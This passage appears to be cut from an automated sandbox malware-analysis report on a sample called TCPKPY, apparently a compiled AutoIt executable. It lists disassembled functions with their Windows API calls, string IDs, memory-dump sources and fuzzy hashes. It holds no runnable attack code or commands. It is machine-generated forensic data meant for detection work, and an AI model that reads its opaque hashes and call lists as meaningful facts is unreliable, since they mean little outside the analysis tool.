                                                                                                                • Instruction Fuzzy Hash: 39915AB4620302DFDB14DF64C884B6ABBB9BF49710F15846EE84ACB291DBB0E855CF50
                                                                                                                Function 0024E704 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 200shareCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00203BCF: _wcscpy.LIBCMT ref: 00203BF2
                                                                                                                  • Part of subcall function 002084A6: __swprintf.LIBCMT ref: 002084E5
                                                                                                                  • Part of subcall function 002084A6: __itow.LIBCMT ref: 00208519
                                                                                                                • __wcsnicmp.LIBCMT ref: 0024E785
                                                                                                                • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 0024E84E
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                                                                                                • String ID: LPT
                                                                                                                • API String ID: 3222508074-1350329615
                                                                                                                • Opcode ID: bb91d36e7bb388b98b65a2bac2ee8a18272bf791a93e50fdfb8ad650c9bf95f1
                                                                                                                • Instruction ID: 9ef9bf08caf8b0fbbbc06af6da508463b6a41e62ad11b30bc19c86068cc3c073
                                                                                                                • Opcode Fuzzy Hash: bb91d36e7bb388b98b65a2bac2ee8a18272bf791a93e50fdfb8ad650c9bf95f1
                                                                                                                • Instruction Fuzzy Hash: 2B616E75A20215AFDF18DF94C895EAEB7B8FF08310F164069F546AB2A1DB70AE50CB50
                                                                                                                Function 00201B72 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 143sleepCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • Sleep.KERNEL32(00000000), ref: 00201B83
                                                                                                                • GlobalMemoryStatusEx.KERNEL32 ref: 00201B9C
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: GlobalMemorySleepStatus
                                                                                                                • String ID: @
                                                                                                                • API String ID: 2783356886-2766056989
                                                                                                                • Opcode ID: 15778be1fba56786918fba06777ce3a95a3a3187e2bd17c97843aa576fef5c50
                                                                                                                • Instruction ID: ad640a96e395749b361595eab9824a29fa8ad477f8a5ae26bb107019bb6e5916
                                                                                                                • Opcode Fuzzy Hash: 15778be1fba56786918fba06777ce3a95a3a3187e2bd17c97843aa576fef5c50
                                                                                                                • Instruction Fuzzy Hash: 35512971418744EBE320AF14D889BABBBECFF95354F81484DF1C8410A6EB7195BC8B56
                                                                                                                Function 0024CE59 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 137COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 0020417D: __fread_nolock.LIBCMT ref: 0020419B
                                                                                                                • _wcscmp.LIBCMT ref: 0024CF49
                                                                                                                • _wcscmp.LIBCMT ref: 0024CF5C
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _wcscmp$__fread_nolock
                                                                                                                • String ID: FILE
                                                                                                                • API String ID: 4029003684-3121273764
                                                                                                                • Opcode ID: 7b90a092d389e4e76d93f7411375c62966db0fac79e5cb92357879d7536db972
                                                                                                                • Instruction ID: ac4e95dbf4935cfc6d243d214fd88be811529b77c66a3b741df022c524cc146b
                                                                                                                • Opcode Fuzzy Hash: 7b90a092d389e4e76d93f7411375c62966db0fac79e5cb92357879d7536db972
                                                                                                                • Instruction Fuzzy Hash: 6641F872610219BADF10EFA4DC41FEFBBB99F49710F10046AF605E7191D7719A688B50
                                                                                                                Function 00229AF3 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 127COMMONLIBRARYCODE
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 0022889E: __getptd_noexit.LIBCMT ref: 0022889E
                                                                                                                • __getbuf.LIBCMT ref: 00229B8A
                                                                                                                • __lseeki64.LIBCMT ref: 00229BFA
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: __getbuf__getptd_noexit__lseeki64
                                                                                                                • String ID: pM#
                                                                                                                • API String ID: 3311320906-1275130232
                                                                                                                • Opcode ID: e02cf580c910585dc27347711ef9089ec4dc068eee8ea7bff37dd414632be3b2
                                                                                                                • Instruction ID: 90aed403f0e8186baa922aa88ac7f37bbc2e0e4f1db507b861eaa900229ff2a0
                                                                                                                • Opcode Fuzzy Hash: e02cf580c910585dc27347711ef9089ec4dc068eee8ea7bff37dd414632be3b2
                                                                                                                • Instruction Fuzzy Hash: EE412671530B267ED3349FA8F891A7A77D49B49334F04861EE4AA8B2D1D374D8A08F10
                                                                                                                Function 0026A578 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • SendMessageW.USER32(00000027,00001132,00000000,?), ref: 0026A668
                                                                                                                • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0026A67D
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend
                                                                                                                • String ID: '
                                                                                                                • API String ID: 3850602802-1997036262
                                                                                                                • Opcode ID: c42b8e3a795203678635606c0a33e6248f6a46fd1d10272a105ed124267648ac
                                                                                                                • Instruction ID: 6d14809801c53a4e94c6322a2dfd969713a6ebcfee4dfc5e5daf3bde7e6d050a
                                                                                                                • Opcode Fuzzy Hash: c42b8e3a795203678635606c0a33e6248f6a46fd1d10272a105ed124267648ac
                                                                                                                • Instruction Fuzzy Hash: 0E410775E1020A9FDF14CF68D881BDA7BB9FB09300F14016AE915AB381D770A995CFA1
                                                                                                                Function 00269567 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • DestroyWindow.USER32(?,?,?,?), ref: 0026961B
                                                                                                                • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00269657
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$DestroyMove
                                                                                                                • String ID: static
                                                                                                                • API String ID: 2139405536-2160076837
                                                                                                                • Opcode ID: 7071c8c86dcb1d1370428b8a076f2f24ea1a229025f19c73c876aea2a5c14139
                                                                                                                • Instruction ID: a6fad3de12cbe5413df8393334497f9c0f09d1b96e346c10f0b84e3601d9f256
                                                                                                                • Opcode Fuzzy Hash: 7071c8c86dcb1d1370428b8a076f2f24ea1a229025f19c73c876aea2a5c14139
                                                                                                                • Instruction Fuzzy Hash: CD318C31520204AEEB109F64DC81FFB77ADFF58764F508619F9A9C7190DA71ACE18B60
                                                                                                                Function 00245B75 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 87windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • _memset.LIBCMT ref: 00245BE4
                                                                                                                • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00245C1F
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InfoItemMenu_memset
                                                                                                                • String ID: 0
                                                                                                                • API String ID: 2223754486-4108050209
                                                                                                                • Opcode ID: 5b739822b837bed1f5b48e4b035934d6a28c7584d282259f2615a8c1f2946429
                                                                                                                • Instruction ID: 51155a9a7b13c473bf12204301b5b7878e8eb3fd3c6575d8bbc1314a697f3bf8
                                                                                                                • Opcode Fuzzy Hash: 5b739822b837bed1f5b48e4b035934d6a28c7584d282259f2615a8c1f2946429
                                                                                                                • Instruction Fuzzy Hash: 6531DB3152072AEBDB2CCF98D8C5BADBBF5EF05354F18001AE9C5961A2D7B09A64CF10
                                                                                                                Function 00256B60 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 83COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • __snwprintf.LIBCMT ref: 00256BDD
                                                                                                                  • Part of subcall function 0020CAEE: _memmove.LIBCMT ref: 0020CB2F
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: __snwprintf_memmove
                                                                                                                • String ID: , $$AUTOITCALLVARIABLE%d
                                                                                                                • API String ID: 3506404897-2584243854
                                                                                                                • Opcode ID: 9c7fb2c95b581734de54890f6ef092d2fdaca73b8b65ce98ff6f510cf32ea9f5
                                                                                                                • Instruction ID: 19407118ea31040857e814f675c44205aa8ec922ccadf9fde8f24e94e641da3e
                                                                                                                • Opcode Fuzzy Hash: 9c7fb2c95b581734de54890f6ef092d2fdaca73b8b65ce98ff6f510cf32ea9f5
                                                                                                                • Instruction Fuzzy Hash: 0821CE31620218AACF04EFA4CC86EEE77B9EF45701F500456F945A7182DB70EE66CFA5
                                                                                                                Function 002691DC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00269269
                                                                                                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00269274
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend
                                                                                                                • String ID: Combobox
                                                                                                                • API String ID: 3850602802-2096851135
                                                                                                                • Opcode ID: 51b25cc2eaea75a8918dbebabfcbbfe778e86b480748dfcdb916822373cde416
                                                                                                                • Instruction ID: 3c8fbd2644bfefa51984518bc46e576ab782f608a47915f00185be08dd7797a6
                                                                                                                • Opcode Fuzzy Hash: 51b25cc2eaea75a8918dbebabfcbbfe778e86b480748dfcdb916822373cde416
                                                                                                                • Instruction Fuzzy Hash: BF119371620109BFEF119F54DC91EEB379EEB893A4F104124F91897290DA719CF18BA0
                                                                                                                Function 0026970B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 0021C619: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0021C657
                                                                                                                  • Part of subcall function 0021C619: GetStockObject.GDI32(00000011), ref: 0021C66B
                                                                                                                  • Part of subcall function 0021C619: SendMessageW.USER32(00000000,00000030,00000000), ref: 0021C675
                                                                                                                • GetWindowRect.USER32(00000000,?), ref: 00269775
                                                                                                                • GetSysColor.USER32(00000012), ref: 0026978F
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                                                                • String ID: static
                                                                                                                • API String ID: 1983116058-2160076837
                                                                                                                • Opcode ID: 307d6556ba063128e16a48f398ca694d1bfab356c13503e1572c450453d328d1
                                                                                                                • Instruction ID: 0bc0d183f1fa51fae13de97ab7f5c16cdaa1d112b0cc08937b184c33958aa235
                                                                                                                • Opcode Fuzzy Hash: 307d6556ba063128e16a48f398ca694d1bfab356c13503e1572c450453d328d1
                                                                                                                • Instruction Fuzzy Hash: 5711597652020AAFDB05DFB8DC46EEA7BA8EB08314F000629F955E3240E634E8A1DB50
                                                                                                                Function 00269424 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetWindowTextLengthW.USER32(00000000), ref: 002694A6
                                                                                                                • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 002694B5
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: LengthMessageSendTextWindow
                                                                                                                • String ID: edit
                                                                                                                • API String ID: 2978978980-2167791130
                                                                                                                • Opcode ID: 84b4d558c2ba490d321a33c2e5c3a676a5c3a3f6795b018dfa6e2b50f0c81bf0
                                                                                                                • Instruction ID: 33d782cd64f99320aa3343923de950a7f03030f6ddd8c07ce19ab9f8a123ee35
                                                                                                                • Opcode Fuzzy Hash: 84b4d558c2ba490d321a33c2e5c3a676a5c3a3f6795b018dfa6e2b50f0c81bf0
                                                                                                                • Instruction Fuzzy Hash: 1C115B71120109AAEF108E64EC45AEB376DEB05374F604724F965971D0CA769CE29B60
                                                                                                                Function 00245C80 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • _memset.LIBCMT ref: 00245CF3
                                                                                                                • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00245D12
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InfoItemMenu_memset
                                                                                                                • String ID: 0
                                                                                                                • API String ID: 2223754486-4108050209
                                                                                                                • Opcode ID: 8c33b4b9ea8832f304b89d50eec5f1bd730ab6e7a6c8f38b04b45d256621e6b8
                                                                                                                • Instruction ID: da38d59537771a1864cdb569ad6182bd10e9f938bc4a1186d0833579a6c30fcf
                                                                                                                • Opcode Fuzzy Hash: 8c33b4b9ea8832f304b89d50eec5f1bd730ab6e7a6c8f38b04b45d256621e6b8
                                                                                                                • Instruction Fuzzy Hash: 68118171D21639EBDB28DE58E849F9977E99F06354F180012F981EB192D3709D24CB91
                                                                                                                Function 002553F6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 61networkCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0025544C
                                                                                                                • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00255475
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Internet$OpenOption
                                                                                                                • String ID: <local>
                                                                                                                • API String ID: 942729171-4266983199
                                                                                                                • Opcode ID: 6e927f8f92fefe813fc46b585cd8f57e80df524ea003cb9e58f7a747235eb338
                                                                                                                • Instruction ID: 7ac6f621eb8dbef175081ffd72ea378c17748701458a16c364b79bd1af499365
                                                                                                                • Opcode Fuzzy Hash: 6e927f8f92fefe813fc46b585cd8f57e80df524ea003cb9e58f7a747235eb338
                                                                                                                • Instruction Fuzzy Hash: 34119174161A32BADB158F5198A8EEAFB68EF12753F10812AF94556040E3B069A8C6B4
                                                                                                                Function 0022B4BF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMONLIBRARYCODE
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00234557
                                                                                                                • ___raise_securityfailure.LIBCMT ref: 0023463E
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FeaturePresentProcessor___raise_securityfailure
                                                                                                                • String ID: (,
                                                                                                                • API String ID: 3761405300-1315560676
                                                                                                                • Opcode ID: c7cdcc9e421cfc235eec66a2b7a02c8d62f3e2e5f5b08135ac0cc48f0c44df91
                                                                                                                • Instruction ID: 6a75a97f2a2453800fd860c2bff2684438b12750c9db31e5014767653a9d5218
                                                                                                                • Opcode Fuzzy Hash: c7cdcc9e421cfc235eec66a2b7a02c8d62f3e2e5f5b08135ac0cc48f0c44df91
                                                                                                                • Instruction Fuzzy Hash: BD21ECB59A0204DBD704DF58FADAE403BB4FB48314F50582AE9098A3A1E3F0A990CF85
                                                                                                                Function 0025ACD3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52networkCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 0025ACF5
                                                                                                                • htons.WSOCK32(00000000,?,00000000), ref: 0025AD32
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: htonsinet_addr
                                                                                                                • String ID: 255.255.255.255
                                                                                                                • API String ID: 3832099526-2422070025
                                                                                                                • Opcode ID: a37ac23eb56743eb484b4ee0a185e92b584f982e4d8ae4d8a129d9ffb31cfe3c
                                                                                                                • Instruction ID: 1fb3849da0d59647e03a5a68eafc8723fcced2dc959f0670fa3c2a287e1f0829
                                                                                                                • Opcode Fuzzy Hash: a37ac23eb56743eb484b4ee0a185e92b584f982e4d8ae4d8a129d9ffb31cfe3c
                                                                                                                • Instruction Fuzzy Hash: FD01D274220205ABDB14AFA4D847FAEB374FF04721F108626F9159B2D1D771E828CB5A
                                                                                                                Function 0023C577 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 0020CAEE: _memmove.LIBCMT ref: 0020CB2F
                                                                                                                • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 0023C5E5
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
